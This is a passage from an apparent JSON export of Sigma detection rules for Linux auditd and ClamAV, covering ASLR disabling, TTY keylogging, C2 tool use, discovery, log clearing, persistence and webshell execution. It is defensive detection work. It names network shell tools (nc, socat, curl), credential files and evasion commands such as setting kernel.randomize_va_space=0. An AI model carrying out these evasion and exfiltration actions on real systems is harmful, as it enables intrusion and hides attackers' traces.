    "content": "title: ASLR Disabled Via Sysctl or Direct Syscall - Linux\nid: e497a24e-9345-4a62-9803-b06d7d7cb132\nstatus: experimental\ndescription: |\n    Detects actions that disable Address Space Layout Randomization (ASLR) in Linux, including:\n      - Use of the `personality` syscall with the ADDR_NO_RANDOMIZE flag (0x0040000)\n      - Modification of the /proc/sys/kernel/randomize_va_space file\n      - Execution of the `sysctl` command to set `kernel.randomize_va_space=0`\n    Disabling ASLR is often used by attackers during exploit development or to bypass memory protection mechanisms.\n    A successful use of these methods can reduce the effectiveness of ASLR and make memory corruption attacks more reliable.\nreferences:\n    - https://github.com/CheraghiMilad/bypass-Neo23x0-auditd-config/blob/f1c478a37911a5447d5ffcd580f22b167bf3df14/personality-syscall/README.md\n    - https://man7.org/linux/man-pages/man2/personality.2.html\n    - https://manual.cs50.io/2/personality\n    - https://linux-audit.com/linux-aslr-and-kernelrandomize_va_space-setting/\nauthor: Milad Cheraghi\ndate: 2025-05-26\nmodified: 2025-12-05\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1562.001\n    - attack.t1055.009\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection_syscall:\n        type: 'SYSCALL'\n        SYSCALL: 'personality'\n        a0: 40000\n    selection_sysctl:\n        type: 'EXECVE'\n        a0: 'sysctl'\n        a1: '-w'\n        a2: 'kernel.randomize_va_space=0' # 0 = disable\n    condition: 1 of selection_*\nfalsepositives:\n    - Debugging or legitimate software testing\nlevel: high\n"
  },
  {
    "path": "rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml",
    "content": "title: Linux Keylogging with Pam.d\nid: 49aae26c-450e-448b-911d-b3c13d178dfc\nstatus: test\ndescription: Detect attempt to enable auditing of TTY input\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md\n    - https://linux.die.net/man/8/pam_tty_audit\n    - https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing\n    - https://access.redhat.com/articles/4409591#audit-record-types-2\nauthor: 'Pawel Mazur'\ndate: 2021-05-24\nmodified: 2022-12-18\ntags:\n    - attack.collection\n    - attack.credential-access\n    - attack.t1003\n    - attack.t1056.001\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection_path_events:\n        type: PATH\n        name:\n            - '/etc/pam.d/system-auth'\n            - '/etc/pam.d/password-auth'\n    selection_tty_events:\n        type:\n            - 'TTY'\n            - 'USER_TTY'\n    condition: 1 of selection_*\nfalsepositives:\n    - Administrative work\nlevel: high\n"
  },
  {
    "path": "rules/linux/auditd/lnx_auditd_password_policy_discovery.yml",
    "content": "title: Password Policy Discovery - Linux\nid: ca94a6db-8106-4737-9ed2-3e3bb826af0a\nstatus: stable\ndescription: Detects password policy discovery commands\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md\n    - https://linux.die.net/man/1/chage\n    - https://man7.org/linux/man-pages/man1/passwd.1.html\n    - https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu\nauthor: Ömer Günal, oscd.community, Pawel Mazur\ndate: 2020-10-08\nmodified: 2024-12-01\ntags:\n    - attack.discovery\n    - attack.t1201\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection_files:\n        type: 'PATH'\n        name:\n            - '/etc/login.defs'\n            - '/etc/pam.d/auth'\n            - '/etc/pam.d/common-account'\n            - '/etc/pam.d/common-auth'\n            - '/etc/pam.d/common-password'\n            - '/etc/pam.d/system-auth'\n            - '/etc/security/pwquality.conf'\n    selection_chage:\n        type: 'EXECVE'\n        a0: 'chage'\n        a1:\n            - '--list'\n            - '-l'\n    selection_passwd:\n        type: 'EXECVE'\n        a0: 'passwd'\n        a1:\n            - '-S'\n            - '--status'\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate administration activities\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/lnx_auditd_susp_c2_commands.yml",
    "content": "title: Suspicious C2 Activities\nid: f7158a64-6204-4d6d-868a-6e6378b467e0\nstatus: test\ndescription: |\n    Detects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd Configuration'.\n    This includes the detection of the following commands; wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap.\n    These commands match a few techniques from the tactics \"Command and Control\", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132)\nreferences:\n    - https://github.com/Neo23x0/auditd\nauthor: Marie Euler\ndate: 2020-05-18\nmodified: 2021-11-27\ntags:\n    - attack.command-and-control\nlogsource:\n    product: linux\n    service: auditd\n    definition: |\n        Required auditd configuration:\n        -w /usr/bin/wget -p x -k susp_activity\n        -w /usr/bin/curl -p x -k susp_activity\n        -w /usr/bin/base64 -p x -k susp_activity\n        -w /bin/nc -p x -k susp_activity\n        -w /bin/netcat -p x -k susp_activity\n        -w /usr/bin/ncat -p x -k susp_activity\n        -w /usr/bin/ss -p x -k susp_activity\n        -w /usr/bin/netstat -p x -k susp_activity\n        -w /usr/bin/ssh -p x -k susp_activity\n        -w /usr/bin/scp -p x -k susp_activity\n        -w /usr/bin/sftp -p x -k susp_activity\n        -w /usr/bin/ftp -p x -k susp_activity\n        -w /usr/bin/socat -p x -k susp_activity\n        -w /usr/bin/wireshark -p x -k susp_activity\n        -w /usr/bin/tshark -p x -k susp_activity\n        -w /usr/bin/rawshark -p x -k susp_activity\n        -w /usr/bin/rdesktop -p x -k susp_activity\n        -w /usr/local/bin/rdesktop -p x -k susp_activity\n        -w /usr/bin/wlfreerdp -p x -k susp_activity\n        -w /usr/bin/xfreerdp -p x -k susp_activity\n        -w /usr/local/bin/xfreerdp -p x -k susp_activity\n        -w /usr/bin/nmap -p x -k susp_activity\n        (via https://github.com/Neo23x0/auditd/blob/ddf2603dbc985f97538d102f13b4e4446b402bae/audit.rules#L336)\ndetection:\n    selection:\n        key: 'susp_activity'\n    condition: selection\nfalsepositives:\n    - Admin or User activity\nlevel: medium\n"
  },
  {
    "path": "rules/linux/auditd/lnx_auditd_system_info_discovery.yml",
    "content": "title: System Information Discovery - Auditd\nid: f34047d9-20d3-4e8b-8672-0a35cc50dc71\nstatus: test\ndescription: Detects System Information Discovery commands\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f296668303c29d3f4c07e42bdd2b28d8dd6625f9/atomics/T1082/T1082.md\nauthor: Pawel Mazur\ndate: 2021-09-03\nmodified: 2023-03-06\ntags:\n    - attack.discovery\n    - attack.t1082\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection_1:\n        type: PATH\n        name:\n            - /etc/lsb-release\n            - /etc/redhat-release\n            - /etc/issue\n    selection_2:\n        type: EXECVE\n        a0:\n            - uname\n            - uptime\n            - lsmod\n            - hostname\n            - env\n    selection_3:\n        type: EXECVE\n        a0: grep\n        a1|contains:\n            - vbox\n            - vm\n            - xen\n            - virtio\n            - hv\n    selection_4:\n        type: EXECVE\n        a0: kmod\n        a1: list\n    condition: 1 of selection_*\nfalsepositives:\n    - Likely\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/path/lnx_auditd_auditing_config_change.yml",
    "content": "title: Auditing Configuration Changes on Linux Host\nid: 977ef627-4539-4875-adf4-ed8f780c4922\nstatus: test\ndescription: Detect changes in auditd configuration files\nreferences:\n    - https://github.com/Neo23x0/auditd/blob/master/audit.rules\n    - Self Experience\nauthor: Mikhail Larin, oscd.community\ndate: 2019-10-25\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1562.006\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: PATH\n        name:\n            - /etc/audit/*\n            - /etc/libaudit.conf\n            - /etc/audisp/*\n    condition: selection\nfalsepositives:\n    - Legitimate administrative activity\nlevel: high\n"
  },
  {
    "path": "rules/linux/auditd/path/lnx_auditd_bpfdoor_file_accessed.yml",
    "content": "title: BPFDoor Abnormal Process ID or Lock File Accessed\nid: 808146b2-9332-4d78-9416-d7e47012d83d\nstatus: test\ndescription: detects BPFDoor .lock and .pid files access in temporary file storage facility\nreferences:\n    - https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/\n    - https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor\nauthor: Rafal Piasecki\ndate: 2022-08-10\ntags:\n    - attack.execution\n    - attack.t1106\n    - attack.t1059\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'PATH'\n        name:\n            - /var/run/haldrund.pid\n            - /var/run/xinetd.lock\n            - /var/run/kdevrund.pid\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/linux/auditd/path/lnx_auditd_hidden_binary_execution.yml",
    "content": "title: Use Of Hidden Paths Or Files\nid: 9e1bef8d-0fff-46f6-8465-9aa54e128c1e\nrelated:\n    - id: d08722cd-3d09-449a-80b4-83ea2d9d4616\n      type: similar\nstatus: test\ndescription: Detects calls to hidden files or files located in hidden directories in NIX systems.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md\nauthor: David Burkett, @signalblur\ndate: 2022-12-30\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'PATH'\n        name|contains: '/.'\n    filter:\n        name|contains:\n            - '/.cache/'\n            - '/.config/'\n            - '/.pyenv/'\n            - '/.rustup/toolchains'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/path/lnx_auditd_ld_so_preload_mod.yml",
    "content": "title: Modification of ld.so.preload\nid: 4b3cb710-5e83-4715-8c45-8b2b5b3e5751\nstatus: test\ndescription: Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.006/T1574.006.md\n    - https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html\nauthor: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community\ndate: 2019-10-24\nmodified: 2021-11-27\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.006\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'PATH'\n        name: '/etc/ld.so.preload'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/auditd/path/lnx_auditd_logging_config_change.yml",
    "content": "title: Logging Configuration Changes on Linux Host\nid: c830f15d-6f6e-430f-8074-6f73d6807841\nstatus: test\ndescription: Detect changes of syslog daemons configuration files\nreferences:\n    - self experience\nauthor: Mikhail Larin, oscd.community\ndate: 2019-10-25\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1562.006\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'PATH'\n        name:\n            - /etc/syslog.conf\n            - /etc/rsyslog.conf\n            - /etc/syslog-ng/syslog-ng.conf\n    condition: selection\nfalsepositives:\n    - Legitimate administrative activity\nlevel: high\n"
  },
  {
    "path": "rules/linux/auditd/path/lnx_auditd_magic_system_request_key.yml",
    "content": "title: Potential Abuse of Linux Magic System Request Key\nid: ea61bb82-a5e0-42e6-8537-91d29500f1b9\nstatus: experimental\ndescription: |\n    Detects the potential abuse of the Linux Magic SysRq (System Request) key by adversaries with root or sufficient privileges\n    to silently manipulate or destabilize a system. By writing to /proc/sysrq-trigger, they can crash the system, kill processes,\n    or disrupt forensic analysis—all while bypassing standard logging. Though intended for recovery and debugging, SysRq can be\n    misused as a stealthy post-exploitation tool. It is controlled via /proc/sys/kernel/sysrq or permanently through /etc/sysctl.conf.\nreferences:\n    - https://www.kernel.org/doc/html/v4.10/_sources/admin-guide/sysrq.txt\n    - https://docs.redhat.com/en/documentation/red_hat_enterprise_linux/4/html/reference_guide/s3-proc-sys-kernel\n    - https://www.splunk.com/en_us/blog/security/threat-update-awfulshred-script-wiper.html\nauthor: Milad Cheraghi\ndate: 2025-05-23\ntags:\n    - attack.execution\n    - attack.t1059.004\n    - attack.impact\n    - attack.t1529\n    - attack.t1489\n    - attack.t1499\nlogsource:\n    product: linux\n    service: auditd\n    definition: |\n        Required auditd configuration:\n        -w /proc/sysrq-trigger -p wa -k sysrq\n        -w /proc/sys/kernel/sysrq -p wa -k sysrq\ndetection:\n    selection:\n        type: 'PATH'\n        name|endswith:\n            # Enable\n            - '/sysrq'\n            - '/sysctl.conf'\n            # Execute\n            - '/sysrq-trigger'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules/linux/auditd/path/lnx_auditd_system_info_discovery2.yml",
    "content": "title: System and Hardware Information Discovery\nid: 1f358e2e-cb63-43c3-b575-dfb072a6814f\nrelated:\n    - id: 42df45e7-e6e9-43b5-8f26-bec5b39cc239\n      type: derived\nstatus: stable\ndescription: Detects system information discovery commands\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-4---linux-vm-check-via-hardware\nauthor: Ömer Günal, oscd.community\ndate: 2020-10-08\nmodified: 2022-11-26\ntags:\n    - attack.discovery\n    - attack.t1082\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'PATH'\n        name:\n            - '/sys/class/dmi/id/bios_version'\n            - '/sys/class/dmi/id/product_name'\n            - '/sys/class/dmi/id/chassis_vendor'\n            - '/proc/scsi/scsi'\n            - '/proc/ide/hd0/model'\n            - '/proc/version'\n            - '/etc/*version'\n            - '/etc/*release'\n            - '/etc/issue'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: informational\n"
  },
  {
    "path": "rules/linux/auditd/path/lnx_auditd_systemd_service_creation.yml",
    "content": "title: Systemd Service Creation\nid: 1bac86ba-41aa-4f62-9d6b-405eac99b485\nstatus: test\ndescription: Detects a creation of systemd services which could be used by adversaries to execute malicious code.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md\nauthor: 'Pawel Mazur'\ndate: 2022-02-03\nmodified: 2022-02-06\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1543.002\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    path:\n        type: 'PATH'\n        nametype: 'CREATE'\n    name_1:\n        name|startswith:\n            - '/usr/lib/systemd/system/'\n            - '/etc/systemd/system/'\n    name_2:\n        name|contains: '/.config/systemd/user/'\n    condition: path and 1 of name_*\nfalsepositives:\n    - Admin work like legit service installs.\nlevel: medium\n"
  },
  {
    "path": "rules/linux/auditd/path/lnx_auditd_unix_shell_configuration_modification.yml",
    "content": "title: Unix Shell Configuration Modification\nid: a94cdd87-6c54-4678-a6cc-2814ffe5a13d\nrelated:\n    - id: e74e15cc-c4b6-4c80-b7eb-dfe49feb7fe9\n      type: obsolete\nstatus: test\ndescription: Detect unix shell configuration modification. Adversaries may establish persistence through executing malicious commands triggered when a new shell is opened.\nreferences:\n    - https://objective-see.org/blog/blog_0x68.html\n    - https://web.archive.org/web/20221204161143/https://www.glitch-cat.com/p/green-lambert-and-attack\n    - https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat\nauthor: Peter Matkovski, IAI\ndate: 2023-03-06\nmodified: 2023-03-15\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.004\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'PATH'\n        name:\n            - '/etc/shells'\n            - '/etc/profile'\n            - '/etc/profile.d/*'\n            - '/etc/bash.bashrc'\n            - '/etc/bashrc'\n            - '/etc/zsh/zprofile'\n            - '/etc/zsh/zshrc'\n            - '/etc/zsh/zlogin'\n            - '/etc/zsh/zlogout'\n            - '/etc/csh.cshrc'\n            - '/etc/csh.login'\n            - '/root/.bashrc'\n            - '/root/.bash_profile'\n            - '/root/.profile'\n            - '/root/.zshrc'\n            - '/root/.zprofile'\n            - '/home/*/.bashrc'\n            - '/home/*/.zshrc'\n            - '/home/*/.bash_profile'\n            - '/home/*/.zprofile'\n            - '/home/*/.profile'\n            - '/home/*/.bash_login'\n            - '/home/*/.bash_logout'\n            - '/home/*/.zlogin'\n            - '/home/*/.zlogout'\n    condition: selection\nfalsepositives:\n    - Admin or User activity are expected to generate some false positives\nlevel: medium\n"
  },
  {
    "path": "rules/linux/auditd/service_stop/lnx_auditd_disable_system_firewall.yml",
    "content": "title: Disable System Firewall\nid: 53059bc0-1472-438b-956a-7508a94a91f0\nstatus: test\ndescription: Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md\n    - https://firewalld.org/documentation/man-pages/firewall-cmd.html\nauthor: 'Pawel Mazur'\ndate: 2022-01-22\ntags:\n    - attack.t1562.004\n    - attack.defense-evasion\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'SERVICE_STOP'\n        unit:\n            - 'firewalld'\n            - 'iptables'\n            - 'ufw'\n    condition: selection\nfalsepositives:\n    - Admin activity\nlevel: high\n"
  },
  {
    "path": "rules/linux/auditd/syscall/lnx_auditd_clean_disable_dmesg_logs_via_syslog.yml",
    "content": "title: Clear or Disable Kernel Ring Buffer Logs via Syslog Syscall\nid: eca5e022-d368-4043-98e5-9736fb01f72f\nstatus: experimental\ndescription: |\n    Detects the use of the `syslog` syscall with action code 5 (SYSLOG_ACTION_CLEAR),\n    (4 is SYSLOG_ACTION_READ_CLEAR and 6 is SYSLOG_ACTION_CONSOLE_OFF) which clears the kernel\n    ring buffer (dmesg logs). This can be used by attackers to hide traces after exploitation\n    or privilege escalation. A common technique is running `dmesg -c`, which triggers this syscall internally.\nreferences:\n    - https://man7.org/linux/man-pages/man2/syslog.2.html\n    - https://man7.org/linux/man-pages/man1/dmesg.1.html\nauthor: Milad Cheraghi\ndate: 2025-05-27\nmodified: 2025-12-05\ntags:\n    - attack.defense-evasion\n    - attack.t1070.002\nlogsource:\n    product: linux\n    service: auditd\n    definition: |\n        Required auditd configuration:\n        -a always,exit -F arch=b64 -S syslog -F a0=4 -k clear_dmesg_logs\n        -a always,exit -F arch=b64 -S syslog -F a0=5 -k clear_dmesg_logs\n        -a always,exit -F arch=b64 -S syslog -F a0=6 -k disable_dmesg_logs\n        -a always,exit -F arch=b32 -S syslog -F a0=4 -k clear_dmesg_logs\n        -a always,exit -F arch=b32 -S syslog -F a0=5 -k clear_dmesg_logs\n        -a always,exit -F arch=b32 -S syslog -F a0=6 -k disable_dmesg_logs\ndetection:\n    selection:\n        type: 'SYSCALL'\n        SYSCALL: 'syslog'\n        a0:\n            - 4 # SYSLOG_ACTION_READ_CLEAR : Read and clear log\n            - 5 # SYSLOG_ACTION_CLEAR: Clear kernel ring buffer (without reading)\n            - 6 # SYSLOG_ACTION_CONSOLE_OFF: Disable logging to console\n    condition: selection\nfalsepositives:\n    - System administrators or scripts that intentionally clear logs\n    - Debugging scripts\nlevel: medium\n"
  },
  {
    "path": "rules/linux/auditd/syscall/lnx_auditd_create_account.yml",
    "content": "title: Creation Of An User Account\nid: 759d0d51-bc99-4b5e-9add-8f5b2c8e7512\nstatus: test\ndescription: Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.\nreferences:\n    - https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-understanding_audit_log_files\n    - https://access.redhat.com/articles/4409591#audit-record-types-2\n    - https://www.youtube.com/watch?v=VmvY5SQm5-Y&ab_channel=M45C07\nauthor: Marie Euler, Pawel Mazur\ndate: 2020-05-18\nmodified: 2022-12-20\ntags:\n    - attack.t1136.001\n    - attack.persistence\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection_syscall_record_type:\n        type: 'SYSCALL'\n        exe|endswith: '/useradd'\n    selection_add_user_record_type:\n        type: 'ADD_USER' # This is logged without having to configure audit rules on both Ubuntu and Centos\n    condition: 1 of selection_*\nfalsepositives:\n    - Admin activity\nlevel: medium\n"
  },
  {
    "path": "rules/linux/auditd/syscall/lnx_auditd_load_module_insmod.yml",
    "content": "title: Loading of Kernel Module via Insmod\nid: 106d7cbd-80ff-4985-b682-a7043e5acb72\nstatus: test\ndescription: |\n    Detects loading of kernel modules with insmod command.\n    Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.\n    Adversaries may use LKMs to obtain persistence within the system or elevate the privileges.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md\n    - https://linux.die.net/man/8/insmod\n    - https://man7.org/linux/man-pages/man8/kmod.8.html\nauthor: 'Pawel Mazur'\ndate: 2021-11-02\nmodified: 2022-12-25\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1547.006\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'SYSCALL'\n        comm: insmod\n        exe: /usr/bin/kmod\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/auditd/syscall/lnx_auditd_network_service_scanning.yml",
    "content": "title: Linux Network Service Scanning - Auditd\nid: 3761e026-f259-44e6-8826-719ed8079408\nrelated:\n    - id: 3e102cd9-a70d-4a7a-9508-403963092f31\n      type: derived\nstatus: test\ndescription: Detects enumeration of local or remote network services.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md\nauthor: Alejandro Ortuno, oscd.community\ndate: 2020-10-21\nmodified: 2023-09-26\ntags:\n    - attack.discovery\n    - attack.t1046\nlogsource:\n    product: linux\n    service: auditd\n    definition: 'Configure these rules https://github.com/Neo23x0/auditd/blob/e181243a7c708e9d579557d6f80e0ed3d3483b89/audit.rules#L182-L183'\ndetection:\n    selection:\n        type: 'SYSCALL'\n        exe|endswith:\n            - '/telnet'\n            - '/nmap'\n            - '/netcat'\n            - '/nc'\n            - '/ncat'\n            - '/nc.openbsd'\n        key: 'network_connect_4'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/syscall/lnx_auditd_split_file_into_pieces.yml",
    "content": "title: Split A File Into Pieces - Linux\nid: 2dad0cba-c62a-4a4f-949f-5f6ecd619769\nstatus: test\ndescription: 'Detection use of the command \"split\" to split files into parts and possible transfer.'\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md\nauthor: 'Igor Fits, oscd.community'\ndate: 2020-10-15\nmodified: 2022-11-28\ntags:\n    - attack.exfiltration\n    - attack.t1030\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'SYSCALL'\n        comm: 'split'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative activity\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/syscall/lnx_auditd_susp_discovery_sysinfo_syscall.yml",
    "content": "title: System Info Discovery via Sysinfo Syscall\nid: b207d563-a1d9-4275-b349-77d1eb55aa6d\nstatus: experimental\ndescription: |\n    Detects use of the sysinfo system call in Linux, which provides a snapshot of key system statistics such as uptime, load averages, memory usage, and the number of running processes.\n    Malware or reconnaissance tools might leverage sysinfo to fingerprint the system - gathering data to determine if it's a viable target.\nreferences:\n    - https://github.com/CheraghiMilad/bypass-Neo23x0-auditd-config/blob/f1c478a37911a5447d5ffcd580f22b167bf3df14/sysinfo-syscall/README.md\n    - https://man7.org/linux/man-pages/man2/sysinfo.2.html\nauthor: Milad Cheraghi\ndate: 2025-05-30\nmodified: 2025-12-05\ntags:\n    - attack.discovery\n    - attack.t1057\n    - attack.t1082\nlogsource:\n    product: linux\n    service: auditd\n    definition: |\n        Required auditd configuration:\n        -a always,exit -F arch=b64 -S sysinfo -k discovery_sysinfo_syscall\n        -a always,exit -F arch=b32 -S sysinfo -k discovery_sysinfo_syscall\ndetection:\n    selection:\n        type: 'SYSCALL'\n        SYSCALL: 'sysinfo'\n    filter_optional_splunk:\n        exe|endswith: '/bin/splunkd'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate administrative activity\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/syscall/lnx_auditd_susp_exe_folders.yml",
    "content": "title: Program Executions in Suspicious Folders\nid: a39d7fa7-3fbd-4dc2-97e1-d87f546b1bbc\nstatus: test\ndescription: Detects program executions in suspicious non-program folders related to malware or hacking activity\nreferences:\n    - Internal Research\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-01-23\nmodified: 2021-11-27\ntags:\n    - attack.t1587\n    - attack.t1584\n    - attack.resource-development\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'SYSCALL'\n        exe|startswith:\n            # Temporary folder\n            - '/tmp/'\n            # Web server\n            - '/var/www/'              # Standard\n            - '/home/*/public_html/'   # Per-user\n            - '/usr/local/apache2/'    # Classical Apache\n            - '/usr/local/httpd/'      # Old SuSE Linux 6.* Apache\n            - '/var/apache/'           # Solaris Apache\n            - '/srv/www/'              # SuSE Linux 9.*\n            - '/home/httpd/html/'      # Redhat 6 or older Apache\n            - '/srv/http/'             # ArchLinux standard\n            - '/usr/share/nginx/html/' # ArchLinux nginx\n            # Data dirs of typically exploited services (incomplete list)\n            - '/var/lib/pgsql/data/'\n            - '/usr/local/mysql/data/'\n            - '/var/lib/mysql/'\n            - '/var/vsftpd/'\n            - '/etc/bind/'\n            - '/var/named/'\n    condition: selection\nfalsepositives:\n    - Admin activity (especially in /tmp folders)\n    - Crazy web applications\nlevel: medium\n"
  },
  {
    "path": "rules/linux/auditd/syscall/lnx_auditd_susp_special_file_creation_via_mknod_syscall.yml",
    "content": "title: Special File Creation via Mknod Syscall\nid: 710bdbce-495d-491d-9a8f-7d0d88d2b41e\nstatus: experimental\ndescription: |\n    Detects usage of the `mknod` syscall to create special files (e.g., character or block devices).\n    Attackers or malware might use `mknod` to create fake devices, interact with kernel interfaces,\n    or establish covert channels in Linux systems.\n    Monitoring the use of `mknod` is important because this syscall is rarely used by legitimate applications,\n    and it can be abused to bypass file system restrictions or create backdoors.\nreferences:\n    - https://man7.org/linux/man-pages/man2/mknod.2.html\n    - https://hopeness.medium.com/master-the-linux-mknod-command-a-comprehensive-guide-1c150a546aa8\nauthor: Milad Cheraghi\ndate: 2025-05-31\nmodified: 2025-12-05\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1543.003\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'SYSCALL'\n        SYSCALL: 'mknod'\n    condition: selection\nfalsepositives:\n    - Device creation by legitimate scripts or init systems (udevadm, MAKEDEV)\n    - Container runtimes or security tools during initialization\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/syscall/lnx_auditd_web_rce.yml",
    "content": "title: Webshell Remote Command Execution\nid: c0d3734d-330f-4a03-aae2-65dacc6a8222\nstatus: test\ndescription: Detects possible command execution by web application/web shell\nreferences:\n    - Personal Experience of the Author\n    - https://www.vaadata.com/blog/what-is-command-injection-exploitations-and-security-best-practices/\nauthor: Ilyas Ochkov, Beyu Denis, oscd.community\ndate: 2019-10-12\nmodified: 2025-12-05\ntags:\n    - attack.persistence\n    - attack.t1505.003\nlogsource:\n    product: linux\n    service: auditd\n    definition: |\n        Required auditd configuration:\n        -a always,exit -F arch=b32 -S execve -F euid=33 -k detect_execve_www\n        -a always,exit -F arch=b64 -S execve -F euid=33 -k detect_execve_www\n        -a always,exit -F arch=b32 -S execveat -F euid=33 -k detect_execve_www\n        -a always,exit -F arch=b64 -S execveat -F euid=33 -k detect_execve_www\n        Change the number \"33\" to the ID of your WebServer user. Default: www-data:x:33:33\ndetection:\n    selection:\n        type: 'SYSCALL'\n        SYSCALL:\n            - 'execve'\n            - 'execveat'\n        euid: 33\n    condition: selection\nfalsepositives:\n    - Admin activity\n    - Crazy web applications\nlevel: critical\n"
  },
  {
    "path": "rules/linux/builtin/clamav/lnx_clamav_relevant_message.yml",
    "content": "title: Relevant ClamAV Message\nid: 36aa86ca-fd9d-4456-814e-d3b1b8e1e0bb\nstatus: stable\ndescription: Detects relevant ClamAV messages\nreferences:\n    - https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/clam_av_rules.xml\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-01\ntags:\n    - attack.resource-development\n    - attack.t1588.001\nlogsource:\n    product: linux\n    service: clamav\ndetection:\n    keywords:\n        - 'Trojan*FOUND'\n        - 'VirTool*FOUND'\n        - 'Webshell*FOUND'\n        - 'Rootkit*FOUND'\n        - 'Htran*FOUND'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
